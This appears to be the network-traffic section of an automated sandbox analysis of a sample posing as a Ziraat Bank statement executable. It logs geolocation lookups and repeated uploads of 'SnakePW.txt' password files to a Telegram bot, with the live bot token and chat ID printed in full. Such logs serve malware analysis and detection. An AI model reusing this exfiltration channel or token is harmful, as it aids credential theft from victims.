                                      2024-09-26 08:59:13 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:13 UTC727INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:13 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5985
                                      Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wz%2FhEhWDU7OaVsUA1Q2Y8%2BbMxNaf%2BJB%2B%2BkLaYCHkpHDibAZOFihJTp%2FL%2BZV0dwQnVNhxRJ%2BTtVMsmczk4HQGE5FSzvU68tlC%2BcFHt%2BxOSMaP%2BINxpTYZ3%2BMg1XLV1NIT%2BoFs%2FRkB"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920e81ea45333c-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-26 08:59:13 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-09-26 08:59:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449743188.114.96.34437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:15 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-09-26 08:59:15 UTC677INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:15 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5987
                                      Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wh0QGnAC0cB1JAUOtmlZFCp7TmxAgtzbMIatUsRcjyO8b6US4bryNWF2B%2BMghcnGPOwKZQqWc7D112wbDqBCxm%2B79VhUc%2BjJWEukl9%2BYdrCGpwlLuCtQ6N4mo6vMXilI2bcJOe5F"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920e8cdf7ac404-EWR
                                      2024-09-26 08:59:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-09-26 08:59:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449745188.114.96.34437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:16 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-09-26 08:59:16 UTC675INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:16 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5988
                                      Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JYD9ksnF14psWE6SQnR0gBwQzo%2FGC3oew6L87kFs65WNSyfDxYxaHdfMnzfO40EgctjQT3n2EQdcNQbi3SrbAA2efs21llf62xk%2B8xwjExdiYNTPaaiUUdyX1EhlaR%2FxpdNUWSDR"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920e94fcf143f4-EWR
                                      2024-09-26 08:59:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-09-26 08:59:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449747188.114.96.34437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:17 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:17 UTC679INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:17 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5989
                                      Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9z3x%2Fw3TXQTzTKGDgOkVNWEhclrW6%2FllS3OQLm%2Bn0Z9vrbNPlgFHbAYXpout4Rw8azbc1KXsxG8twHBtA%2FaoqbUUHoKVnXiCLhIeKUjT0cgQxvNT55HHIaHN5KwxzshEK%2Fxod5k"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920e9d2e4c7d11-EWR
                                      2024-09-26 08:59:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-09-26 08:59:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449750188.114.96.34437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:19 UTC675INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:19 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5991
                                      Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEGvglPmw%2B6CKuuBp9pkiBi5vcrj63ImDqntzJZEFV6MxzcvJJHgTpvx5DSXyCDupngfA7XP1C5gZIIy84Opo%2Fa0zw79zMgIIykaEnxhNcZx8IV9E7JI5VNfW%2FLX40xQhvQHLHSX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920ea51e5b0cac-EWR
                                      2024-09-26 08:59:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-09-26 08:59:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.449756149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:25 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcde95f4d401cd
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:25 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 65 39 35 66 34 64 34 30 31 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcde95f4d401cdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:25 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:25 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:25 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 36 35 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35822,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341165,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.449757149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:35 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf111105bcbc
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 08:59:35 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 31 31 31 31 30 35 62 63 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf111105bcbcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:35 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:35 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:35 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 37 35 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35825,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341175,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.449758149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:36 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf1bc90c75f3
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:36 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 31 62 63 39 30 63 37 35 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf1bc90c75f3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:36 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:36 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:36 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 37 36 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35826,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341176,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.449759149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:37 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf27d2b5daa6
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 08:59:37 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 32 37 64 32 62 35 64 61 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf27d2b5daa6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:37 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
